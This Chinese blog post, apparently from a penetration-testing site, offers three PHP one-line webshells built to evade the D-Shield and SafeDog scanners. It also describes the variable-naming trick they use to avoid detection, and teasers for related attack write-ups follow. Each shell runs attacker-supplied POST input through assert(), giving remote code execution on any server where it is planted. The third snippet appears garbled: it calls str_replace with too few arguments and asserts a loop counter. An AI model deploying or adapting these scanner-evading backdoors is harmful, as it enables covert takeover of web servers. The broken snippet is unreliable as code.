新出炉三个过D盾安全狗PHP一句话

少羽.
393
文章
72
评论
2019年5月30日14:06:40 评论 9,978 289字阅读0分57秒

D盾更新了!准备写一个长期更新的免杀webshell总结

<?php
function a(){
	return $a=$_POST['1'];
}
@assert(a());
?>

<?php
$value=$key = "a";
foreach($_POST as $key=>$value){
	assert($value);
}

<?php
$x='$_PO'."STasdasd[".'1]';
$x = $x.str_replace('STasdasd',"ST[");
 
for ($x=0; $x<=0; $x++) {
	assert("$x");
}

可以发现的规律是当已经定义的变量和循环的变量名一致时,D盾就不是那么敏感了

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin
广告也精彩
对某DDOS页端源码的一次简单审计 漏洞分析

对某DDOS页端源码的一次简单审计

今天我们审计一套DDOS程序,源码原作者是开心.(具体是不是我也不知道,反正就是这样吧!) 这套源码也就是你们所谓的红色ddos页端源码,这套源码 其原作者承认过自己留后门,但是只说了一部分,我们先来...
discuz x3.4 getshell漏洞 漏洞分析

discuz x3.4 getshell漏洞

开始 2019年7月11日, Discuz!ML被发现存在一处远程代码执行漏洞,攻击者通过在请求流量的cookie字段中的language参数处插入构造的payload,进行远程代码执行利用,该漏洞利...
渗透培训《文件包含》漏洞 渗透笔记

渗透培训《文件包含》漏洞

原理 文件包含漏洞产生的原因是在通过php函数引入文件时,由于传入的文件名没有经过合理的校验,从而引发了文件的泄漏或者恶意代码的注入 本文包含 图片马使用教程(很多人知道图片马却不知道使用方法) ph...
匿名

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: